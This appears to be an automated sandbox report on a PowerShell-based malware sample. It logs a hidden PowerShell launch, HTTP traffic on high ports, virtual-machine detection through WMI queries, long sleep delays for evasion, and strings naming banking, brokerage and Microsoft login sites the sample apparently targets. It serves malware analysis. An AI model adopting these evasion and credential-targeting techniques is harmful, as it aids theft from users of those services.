Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 49707
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4907 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4837 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1994 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6864 Thread sleep time: -17524406870024063s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2788 Thread sleep count: 1994 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3532 Thread sleep count: 96 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: tmpEBDE.tmp.3.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: discord.comVMware20,11696494690f
Source: tmpEBDE.tmp.3.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: tmpEBDE.tmp.3.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: tmpEBDE.tmp.3.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: tmpEBDE.tmp.3.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: tmpEBDE.tmp.3.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: tmpEBDE.tmp.3.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: tmpEBDE.tmp.3.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: tmpEBDE.tmp.3.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: tmpEBDE.tmp.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: tmpEBDE.tmp.3.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: tmpEBDE.tmp.3.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: tmpEBDE.tmp.3.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: tmpEBDE.tmp.3.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: tmpEBDE.tmp.3.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: tmpEBDE.tmp.3.dr Binary or memory string: global block list test formVMware20,11696494690
